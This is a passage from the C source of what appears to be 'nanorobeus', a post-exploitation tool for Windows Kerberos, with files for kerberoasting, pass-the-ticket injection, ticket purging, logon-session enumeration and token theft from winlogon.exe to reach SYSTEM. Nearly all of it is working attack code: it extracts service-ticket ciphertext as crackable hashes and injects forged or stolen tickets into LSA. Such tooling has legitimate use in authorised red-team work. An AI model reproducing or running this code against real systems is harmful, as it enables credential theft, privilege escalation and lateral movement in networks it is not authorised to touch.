"DES3_CBC_MD5"; 29 | break; 30 | case DES3_CBC_SHA1: 31 | encTypeStr = "DES3_CBC_SHA1"; 32 | break; 33 | case DSAWITHSHA1_CMSOID: 34 | encTypeStr = "DSAWITHSHA1_CMSOID"; 35 | break; 36 | case MD5WITHRSAENCRYPTION_CMSOID: 37 | encTypeStr = "MD5WITHRSAENCRYPTION_CMSOID"; 38 | break; 39 | case SHA1WITHRSAENCRYPTION_CMSOID: 40 | encTypeStr = "SHA1WITHRSAENCRYPTION_CMSOID"; 41 | break; 42 | case RC2CBC_ENVOID: 43 | encTypeStr = "RC2CBC_ENVOID"; 44 | break; 45 | case RSAENCRYPTION_ENVOID: 46 | encTypeStr = "RSAENCRYPTION_ENVOID"; 47 | break; 48 | case RSAES_OAEP_ENV_OID: 49 | encTypeStr = "RSAES_OAEP_ENV_OID"; 50 | break; 51 | case DES3_CBC_SHA1_KD: 52 | encTypeStr = "DES3_CBC_SHA1_KD"; 53 | break; 54 | case AES128_CTS_HMAC_SHA1: 55 | encTypeStr = "AES128_CTS_HMAC_SHA1"; 56 | break; 57 | case AES256_CTS_HMAC_SHA1: 58 | encTypeStr = "AES256_CTS_HMAC_SHA1"; 59 | break; 60 | case RC4_HMAC: 61 | encTypeStr = "RC4_HMAC"; 62 | break; 63 | case RC4_HMAC_EXP: 64 | encTypeStr = "RC4_HMAC_EXP"; 65 | break; 66 | case SUBKEY_KEYMATERIAL: 67 | encTypeStr = "SUBKEY_KEYMATERIAL"; 68 | break; 69 | case OLD_EXP: 70 | encTypeStr = "OLD_EXP"; 71 | break; 72 | default: 73 | encTypeStr = ""; 74 | break; 75 | } 76 | return encTypeStr; 77 | } 78 | 79 | SYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li) { 80 | FILETIME ft; 81 | SYSTEMTIME st_utc; 82 | ft.dwHighDateTime = li.HighPart; 83 | ft.dwLowDateTime = li.LowPart; 84 | KERNEL32$FileTimeToSystemTime(&ft, &st_utc); 85 | return st_utc; 86 | } 87 | 88 | BOOL IsHighIntegrity(HANDLE TokenHandle) { 89 | BOOL b; 90 | SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; 91 | PSID AdministratorsGroup; 92 | b = ADVAPI32$AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 93 | 0, 0, 0, 0, &AdministratorsGroup); 94 | if (b) { 95 | if (!ADVAPI32$CheckTokenMembership(NULL, AdministratorsGroup, &b)) { 96 | b = FALSE; 97 | } 98 | ADVAPI32$FreeSid(AdministratorsGroup); 99 | } 100 | 101 | return b; 102 | } 103 | 104 | BOOL IsSystem(HANDLE TokenHandle) { 105 | HANDLE hToken = NULL; 106 | UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES]; 107 | PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser; 108 | ULONG cbTokenUser; 109 | SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY; 110 | PSID pSystemSid; 111 | BOOL bSystem; 112 | 113 | if (!ADVAPI32$GetTokenInformation(hToken, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) { 114 | return FALSE; 115 | } 116 | 117 | if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) 118 | return FALSE; 119 | 120 | bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid); 121 | ADVAPI32$FreeSid(pSystemSid); 122 | return bSystem; 123 | } 124 | 125 | NTSTATUS GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) { 126 | HANDLE hLsaLocal; 127 | LSA_OPERATIONAL_MODE mode = 0; 128 | NTSTATUS status = STATUS_SUCCESS; 129 | if (!highIntegrity) { 130 | status = SECUR32$LsaConnectUntrusted(&hLsaLocal); 131 | if (!NT_SUCCESS(status)) { 132 | status = ADVAPI32$LsaNtStatusToWinError(status); 133 | } 134 | } else { 135 | // AuditPol.exe /set /subcategory:"Security System Extension" 136 | // /success:enable /failure:enable Event ID 4611 Note: detect elevation via 137 | // winlogon.exe. 138 | char* name = "Winlogon"; 139 | STRING lsaString = (STRING){.Length = 8, .MaximumLength = 9, .Buffer = name}; 140 | SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode); 141 | if (hLsaLocal == NULL) { 142 | if (IsSystem(hToken)) { 143 | status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode); 144 | if (!NT_SUCCESS(status)) { 145 | status = ADVAPI32$LsaNtStatusToWinError(status); 146 | } 147 | } else { 148 | if (ElevateToSystem()) { 149 | status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode); 150 | if (!NT_SUCCESS(status)) { 151 | status = ADVAPI32$LsaNtStatusToWinError(status); 152 | } 153 | ADVAPI32$RevertToSelf(); 154 | } else { 155 | status = KERNEL32$GetLastError(); 156 | } 157 | } 158 | } 159 | } 160 | 161 | *hLsa = hLsaLocal; 162 | return status; 163 | } 164 | 165 | int GetProcessIdByName(WCHAR* processName) { 166 | HANDLE hProcessSnap; 167 | PROCESSENTRY32W pe32; 168 | int pid = -1; 169 | 170 | hProcessSnap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 171 | if (hProcessSnap == INVALID_HANDLE_VALUE) { 172 | return pid; 173 | } 174 | 175 | pe32.dwSize = sizeof(PROCESSENTRY32W); 176 | if (!KERNEL32$Process32FirstW(hProcessSnap, &pe32)) { 177 | KERNEL32$CloseHandle(hProcessSnap); 178 | return pid; 179 | } 180 | 181 | do { 182 | WCHAR* procName = pe32.szExeFile; 183 | if (MSVCRT$wcscmp(procName, processName) == 0) { 184 | pid = pe32.th32ProcessID; 185 | break; 186 | } 187 | 188 | } while (KERNEL32$Process32NextW(hProcessSnap, &pe32)); 189 | KERNEL32$CloseHandle(hProcessSnap); 190 | return pid; 191 | } 192 | 193 | BOOL ElevateToSystem() { 194 | int pid = GetProcessIdByName(L"winlogon.exe"); 195 | if (pid == -1) { 196 | return FALSE; 197 | } 198 | BOOL res = FALSE; 199 | HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); 200 | if (hProcess != NULL) { 201 | HANDLE hDupToken; 202 | HANDLE hToken; 203 | if (ADVAPI32$OpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken)) { 204 | if (hToken != NULL) { 205 | if (ADVAPI32$DuplicateToken(hToken, SecurityImpersonation, &hDupToken)) { 206 | if (ADVAPI32$ImpersonateLoggedOnUser(hDupToken)) { 207 | res = TRUE; 208 | } 209 | KERNEL32$CloseHandle(hDupToken); 210 | } 211 | KERNEL32$CloseHandle(hToken); 212 | } 213 | } 214 | 215 | KERNEL32$CloseHandle(hProcess); 216 | } 217 | return res; 218 | } 219 | 220 | char* GetNarrowStringFromUnicode(UNICODE_STRING src) { 221 | int len = src.Length / sizeof(WCHAR); 222 | char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char)); 223 | if (dest == NULL) { 224 | return "(mem_alloc_error)"; 225 | } 226 | MSVCRT$wcstombs(dest, src.Buffer, len); 227 | dest[len] = '\0'; 228 | return dest; 229 | } 230 | 231 | char* GetNarrowString(WCHAR* src) { 232 | int len = MSVCRT$wcslen(src); 233 | char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char)); 234 | if (dest == NULL) { 235 | return "(mem_alloc_error)"; 236 | } 237 | MSVCRT$wcstombs(dest, src, len); 238 | dest[len] = '\0'; 239 | return dest; 240 | } 241 | 242 | WCHAR* GetWideString(char* src) { 243 | int len = MSVCRT$strlen(src); 244 | WCHAR* dest = (WCHAR*)MSVCRT$calloc(len + 1, sizeof(WCHAR)); 245 | if (dest == NULL) { 246 | return NULL; 247 | } 248 | MSVCRT$mbstowcs(dest, src, len); 249 | return dest; 250 | } -------------------------------------------------------------------------------- /nanorobeus/src/kerberoast.c: -------------------------------------------------------------------------------- 1 | #include "kerberoast.h" 2 | #include "tgtdeleg.h" 3 | 4 | void execute_kerberoast(WCHAR** dispatch, char* spn) { 5 | PUCHAR apreq; 6 | ULONG apreqSize; 7 | PRINT(dispatch, "[*] Target SPN: %s\n", spn); 8 | LONG status = RequestApReq(spn, &apreq, &apreqSize, FALSE); 9 | if (status == 0) { 10 | PBYTE tokID = SearchOID(apreq, apreqSize); 11 | if (*(PUSHORT)tokID == 0x0001) { 12 | PKERB_AP_REQUEST apRequest; 13 | KERBERR kerbError; 14 | apreqSize -= (LONG)(tokID - (PBYTE)apreq); 15 | ASN1module_t module = KRB5_Module_Startup(); 16 | if (module != NULL) { 17 | kerbError = KerbUnpackData(module, tokID + sizeof(SHORT), apreqSize, KERB_AP_REQUEST_PDU, &apRequest); 18 | if (KERB_SUCCESS(kerbError)) { 19 | int encType = apRequest->ticket.encrypted_part.encryption_type; 20 | int cipherTextSize = apRequest->ticket.encrypted_part.cipher_text.length; 21 | UCHAR* cipherText = apRequest->ticket.encrypted_part.cipher_text.value; 22 | KERB_PRINCIPAL_NAME_name_string_Seq service = apRequest->ticket.server_name.name_string->value; 23 | KERB_PRINCIPAL_NAME_name_string_Seq host = apRequest->ticket.server_name.name_string->next->value; 24 | KERB_REALM domain = apRequest->ticket.realm; 25 | 26 | if (encType == 17 || encType == 18) { 27 | PRINT(dispatch, "[*] Note: Specify valid username instead of 'USER'\n"); 28 | PRINT(dispatch, "[+] Hash: "); 29 | PRINT(dispatch, "$krb5tgs$%d$USER$%s$*%s/%s*$", encType, domain, service, host); 30 | for (int i = cipherTextSize - 12; i < cipherTextSize; i++) { 31 | PRINT(dispatch, "%.2x", cipherText[i]); 32 | } 33 | PRINT(dispatch, "$"); 34 | for (int i = 0; i < cipherTextSize - 12; i++) { 35 | PRINT(dispatch, "%.2x", cipherText[i]); 36 | } 37 | PRINT(dispatch, "\n"); 38 | } else if (encType == 23) { 39 | PRINT(dispatch, "[+] Hash: "); 40 | PRINT(dispatch, "$krb5tgs$%d$*$%s$%s/%s*$", encType, domain, service, host); 41 | for (int i = 0; i < cipherTextSize; i++) { 42 | if (i == 16) { 43 | PRINT(dispatch, "$"); 44 | } 45 | PRINT(dispatch, "%.2x", cipherText[i]); 46 | } 47 | PRINT(dispatch, "\n"); 48 | } else { 49 | PRINT(dispatch, "[!] Unsupported encryption type: %s\n", GetEncryptionTypeString(encType)); 50 | } 51 | KerbFreeData(module, KERB_AP_REQUEST_PDU, apRequest); 52 | } else { 53 | PRINT(dispatch, "[!] Failed to unpack AP-REQ: 0x%x\n", kerbError); 54 | } 55 | KRB5_Module_Cleanup(module); 56 | } else { 57 | PRINT(dispatch, "[!] Could not create ASN.1 module\n"); 58 | } 59 | MSVCRT$free(apreq); 60 | } else { 61 | PRINT(dispatch, "[!] Kerberos OID not found\n"); 62 | } 63 | } else { 64 | PRINT(dispatch, "[!] Failed to request AP-REQ: 0x%x\n", status); 65 | } 66 | } -------------------------------------------------------------------------------- /nanorobeus/src/luid.c: -------------------------------------------------------------------------------- 1 | #include "luid.h" 2 | 3 | void execute_luid(WCHAR** dispatch, HANDLE hToken) { 4 | LUID* currentLUID = GetCurrentLUID(hToken); 5 | if (currentLUID == NULL) { 6 | PRINT(dispatch, "[!] Unable to get current session LUID: %ld\n", KERNEL32$GetLastError()); 7 | return; 8 | } 9 | PRINT(dispatch, "[+] Current LogonId: %lx:0x%lx\n\n", currentLUID->HighPart, currentLUID->LowPart); 10 | MSVCRT$free(currentLUID); 11 | } 12 | 13 | LUID* GetCurrentLUID(HANDLE TokenHandle) { 14 | TOKEN_STATISTICS tokenStats; 15 | DWORD tokenSize; 16 | if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize)) { 17 | return NULL; 18 | } 19 | 20 | LUID* luid = MSVCRT$calloc(1, sizeof(LUID)); 21 | if (luid == NULL) { 22 | return NULL; 23 | } 24 | luid->HighPart = tokenStats.AuthenticationId.HighPart; 25 | luid->LowPart = tokenStats.AuthenticationId.LowPart; 26 | return luid; 27 | } -------------------------------------------------------------------------------- /nanorobeus/src/ptt.c: -------------------------------------------------------------------------------- 1 | #include "ptt.h" 2 | 3 | void execute_ptt(WCHAR** dispatch, HANDLE hToken, char* ticket, LUID luid, BOOL currentLuid) { 4 | BOOL highIntegrity = IsHighIntegrity(hToken); 5 | if (!highIntegrity && !currentLuid) { 6 | PRINT(dispatch, "[!] Not in high integrity.\n"); 7 | return; 8 | } 9 | HANDLE hLsa; 10 | if (currentLuid) { 11 | highIntegrity = FALSE; 12 | } 13 | NTSTATUS status = GetLsaHandle(hToken, highIntegrity, &hLsa); 14 | if (!NT_SUCCESS(status)) { 15 | PRINT(dispatch, "[!] GetLsaHandle %ld\n", status); 16 | return; 17 | } 18 | ULONG authPackage; 19 | LSA_STRING krbAuth = {.Buffer = "kerberos", .Length = 8, .MaximumLength = 9}; 20 | status = SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage); 21 | if (!NT_SUCCESS(status)) { 22 | PRINT(dispatch, "[!] LsaLookupAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status)); 23 | SECUR32$LsaDeregisterLogonProcess(hLsa); 24 | return; 25 | } 26 | 27 | int decoded_len = Base64decode_len(ticket); 28 | char* decoded = (char*)MSVCRT$calloc(decoded_len, sizeof(char)); 29 | if (decoded == NULL) { 30 | PRINT(dispatch, "[!] Base64 - could not allocate the memory.\n"); 31 | SECUR32$LsaDeregisterLogonProcess(hLsa); 32 | return; 33 | } 34 | Base64decode(decoded, ticket); 35 | KERB_SUBMIT_TKT_REQUEST* submitRequest = NULL; 36 | int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decoded_len; 37 | submitRequest = (KERB_SUBMIT_TKT_REQUEST*)MSVCRT$calloc(submitSize, sizeof(KERB_SUBMIT_TKT_REQUEST)); 38 | if (submitRequest == NULL) { 39 | PRINT(dispatch, "[!] KERB_SUBMIT_TKT_REQUEST - could not allocate memory.\n"); 40 | MSVCRT$free(decoded); 41 | SECUR32$LsaDeregisterLogonProcess(hLsa); 42 | return; 43 | } 44 | submitRequest->MessageType = _KerbSubmitTicketMessage; 45 | submitRequest->KerbCredSize = decoded_len; 46 | submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST); 47 | if (highIntegrity) { 48 | submitRequest->LogonId = luid; 49 | } 50 | MSVCRT$memcpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decoded, decoded_len); 51 | MSVCRT$free(decoded); 52 | NTSTATUS protocolStatus; 53 | ULONG responseSize; 54 | PVOID response; 55 | status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, 56 | &responseSize, &protocolStatus); 57 | if (NT_SUCCESS(status)) { 58 | if (NT_SUCCESS(protocolStatus)) { 59 | PRINT(dispatch, "[+] Ticket successfully imported.\n"); 60 | } else { 61 | status = ADVAPI32$LsaNtStatusToWinError(protocolStatus); 62 | PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus: %ld\n", status); 63 | } 64 | } else { 65 | status = ADVAPI32$LsaNtStatusToWinError(status); 66 | PRINT(dispatch, "[!] LsaCallAuthenticationPackage Status: %ld\n", status); 67 | } 68 | 69 | if (submitRequest != NULL) { 70 | MSVCRT$free(submitRequest); 71 | } 72 | SECUR32$LsaDeregisterLogonProcess(hLsa); 73 | } -------------------------------------------------------------------------------- /nanorobeus/src/purge.c: -------------------------------------------------------------------------------- 1 | #include "purge.h" 2 | 3 | void execute_purge(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid) { 4 | ULONG authPackage; 5 | HANDLE hLsa; 6 | void* purgeResponse; 7 | ULONG responseSize; 8 | NTSTATUS protocolStatus; 9 | 10 | BOOL highIntegrity = IsHighIntegrity(hToken); 11 | if (!highIntegrity && !currentLuid) { 12 | PRINT(dispatch, "[!] Not in high integrity.\n"); 13 | return; 14 | } 15 | 16 | if (currentLuid) { 17 | highIntegrity = FALSE; 18 | } 19 | 20 | NTSTATUS status = GetLsaHandle(hToken, highIntegrity, &hLsa); 21 | if (!NT_SUCCESS(status)) { 22 | PRINT(dispatch, "[!] GetLsaHandle %ld\n", status); 23 | return; 24 | } 25 | LSA_STRING krbAuth = {.Buffer = "kerberos", .Length = 8, .MaximumLength = 9}; 26 | status = SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage); 27 | if (!NT_SUCCESS(status)) { 28 | PRINT(dispatch, "[!] LsaLookupAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status)); 29 | SECUR32$LsaDeregisterLogonProcess(hLsa); 30 | return; 31 | } 32 | KERB_PURGE_TKT_CACHE_REQUEST purgeRequest; 33 | purgeRequest.MessageType = KerbPurgeTicketCacheMessage; 34 | if (highIntegrity) { 35 | purgeRequest.LogonId = luid; 36 | } else { 37 | purgeRequest.LogonId = (LUID){.HighPart = 0, .LowPart = 0}; 38 | } 39 | purgeRequest.RealmName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1}; 40 | purgeRequest.ServerName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1}; 41 | status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest, 42 | sizeof(KERB_PURGE_TKT_CACHE_REQUEST), &purgeResponse, &responseSize, &protocolStatus); 43 | 44 | if (NT_SUCCESS(status)) { 45 | if (NT_SUCCESS(protocolStatus)) { 46 | PRINT(dispatch, "[+] Successfully purged tickets.\n"); 47 | } else { 48 | PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus %ld\n", 49 | ADVAPI32$LsaNtStatusToWinError(protocolStatus)); 50 | } 51 | } else { 52 | PRINT(dispatch, "[!] LsaCallAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status)); 53 | } 54 | 55 | SECUR32$LsaDeregisterLogonProcess(hLsa); 56 | } -------------------------------------------------------------------------------- /nanorobeus/src/sessions.c: -------------------------------------------------------------------------------- 1 | #include "sessions.h" 2 | 3 | void execute_sessions(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid) { 4 | BOOL highIntegrity = IsHighIntegrity(hToken); 5 | if (!highIntegrity && !currentLuid) { 6 | PRINT(dispatch, "[!] Not in high integrity.\n"); 7 | return; 8 | } 9 | 10 | LOGON_SESSION_DATA sessionData; 11 | PSECURITY_LOGON_SESSION_DATA data; 12 | NTSTATUS status = GetLogonSessionData(luid, &sessionData); 13 | 14 | if (NT_SUCCESS(status)) { 15 | for (int i = 0; i < sessionData.sessionCount; i++) { 16 | data = sessionData.sessionData[i]; 17 | if (data != NULL) { 18 | PrintLogonSessionData(dispatch, *data); 19 | if (i != sessionData.sessionCount - 1) { 20 | PRINT(dispatch, "\n\n"); 21 | } 22 | SECUR32$LsaFreeReturnBuffer(data); 23 | } 24 | } 25 | MSVCRT$free(sessionData.sessionData); 26 | } else { 27 | PRINT(dispatch, "[!] execute_sessions GetLogonSessionData: %ld", status); 28 | } 29 | } 30 | 31 | NTSTATUS GetLogonSessionData(LUID luid, LOGON_SESSION_DATA* data) { 32 | LOGON_SESSION_DATA sessionData; 33 | PSECURITY_LOGON_SESSION_DATA logonData = NULL; 34 | NTSTATUS status; 35 | if (luid.LowPart != 0) { 36 | status = SECUR32$LsaGetLogonSessionData(&luid, &logonData); 37 | if (NT_SUCCESS(status)) { 38 | sessionData.sessionData = MSVCRT$calloc(1, sizeof(*sessionData.sessionData)); 39 | if (sessionData.sessionData != NULL) { 40 | sessionData.sessionCount = 1; 41 | sessionData.sessionData[0] = logonData; 42 | *data = sessionData; 43 | } else { 44 | status = STATUS_MEMORY_NOT_ALLOCATED; 45 | } 46 | } else { 47 | status = ADVAPI32$LsaNtStatusToWinError(status); 48 | } 49 | } else { 50 | ULONG logonSessionCount; 51 | PLUID logonSessionList; 52 | status = SECUR32$LsaEnumerateLogonSessions(&logonSessionCount, &logonSessionList); 53 | if (NT_SUCCESS(status)) { 54 | sessionData.sessionData = MSVCRT$calloc(logonSessionCount, sizeof(*sessionData.sessionData)); 55 | if (sessionData.sessionData != NULL) { 56 | sessionData.sessionCount = logonSessionCount; 57 | for (int i = 0; i < logonSessionCount; i++) { 58 | LUID luid = logonSessionList[i]; 59 | status = SECUR32$LsaGetLogonSessionData(&luid, &logonData); 60 | if (NT_SUCCESS(status)) { 61 | sessionData.sessionData[i] = logonData; 62 | } else { 63 | sessionData.sessionData[i] = NULL; 64 | } 65 | } 66 | SECUR32$LsaFreeReturnBuffer(logonSessionList); 67 | *data = sessionData; 68 | } else { 69 | status = STATUS_MEMORY_NOT_ALLOCATED; 70 | } 71 | } else { 72 | status = ADVAPI32$LsaNtStatusToWinError(status); 73 | } 74 | } 75 | return status; 76 | } 77 | 78 | char* GetLogonTypeString(ULONG uLogonType) { 79 | char* logonType = NULL; 80 | switch (uLogonType) { 81 | case LOGON32_LOGON_INTERACTIVE: 82 | logonType = "Interactive"; 83 | break; 84 | case LOGON32_LOGON_NETWORK: 85 | logonType = "Network"; 86 | break; 87 | case LOGON32_LOGON_BATCH: 88 | logonType = "Batch"; 89 | break; 90 | case LOGON32_LOGON_SERVICE: 91 | logonType = "Service"; 92 | break; 93 | case LOGON32_LOGON_UNLOCK: 94 | logonType = "Unlock"; 95 | break; 96 | case LOGON32_LOGON_NETWORK_CLEARTEXT: 97 | logonType = "Network_Cleartext"; 98 | break; 99 | case LOGON32_LOGON_NEW_CREDENTIALS: 100 | logonType = "New_Credentials"; 101 | break; 102 | default: 103 | logonType = "(0)"; 104 | break; 105 | } 106 | return logonType; 107 | } 108 | 109 | void PrintLogonSessionData(WCHAR** dispatch, SECURITY_LOGON_SESSION_DATA data) { 110 | WCHAR* sid = NULL; 111 | PRINT(dispatch, "UserName : %.*s", data.UserName.Length / (int)sizeof(char), 112 | GetNarrowString(data.UserName.Buffer)); 113 | PRINT(dispatch, "Domain : %.*s", data.LogonDomain.Length / (int)sizeof(char), 114 | GetNarrowString(data.LogonDomain.Buffer)); 115 | PRINT(dispatch, "LogonId : %lx:0x%lx", data.LogonId.HighPart, data.LogonId.LowPart); 116 | PRINT(dispatch, "Session : %ld", data.Session); 117 | if (ADVAPI32$ConvertSidToStringSidW(data.Sid, &sid)) { 118 | PRINT(dispatch, "UserSID : %s", GetNarrowString(sid)); 119 | } else { 120 | PRINT(dispatch, "UserSID : -"); 121 | } 122 | PRINT(dispatch, "Authentication package : %.*s", data.AuthenticationPackage.Length / (int)sizeof(char), 123 | GetNarrowString(data.AuthenticationPackage.Buffer)); 124 | char* logonType = GetLogonTypeString(data.LogonType); 125 | PRINT(dispatch, "LogonType : %s", logonType); 126 | SYSTEMTIME st_utc = ConvertToSystemtime(data.LogonTime); 127 | PRINT(dispatch, "LogonTime (UTC) : %d/%d/%d %d:%d:%d", st_utc.wDay, st_utc.wMonth, st_utc.wYear, 128 | st_utc.wHour, st_utc.wMinute, st_utc.wSecond); 129 | PRINT(dispatch, "LogonServer : %.*s", data.LogonServer.Length / (int)sizeof(char), 130 | GetNarrowString(data.LogonServer.Buffer)); 131 | PRINT(dispatch, "LogonServerDNSDomain : %.*s", data.DnsDomainName.Length / (int)sizeof(char), 132 | GetNarrowString(data.DnsDomainName.Buffer)); 133 | PRINT(dispatch, "UserPrincipalName : %.*s\n", data.Upn.Length / (int)sizeof(char), 134 | GetNarrowString(data.Upn.Buffer)); 135 | } --------------------------------------------------------------------------------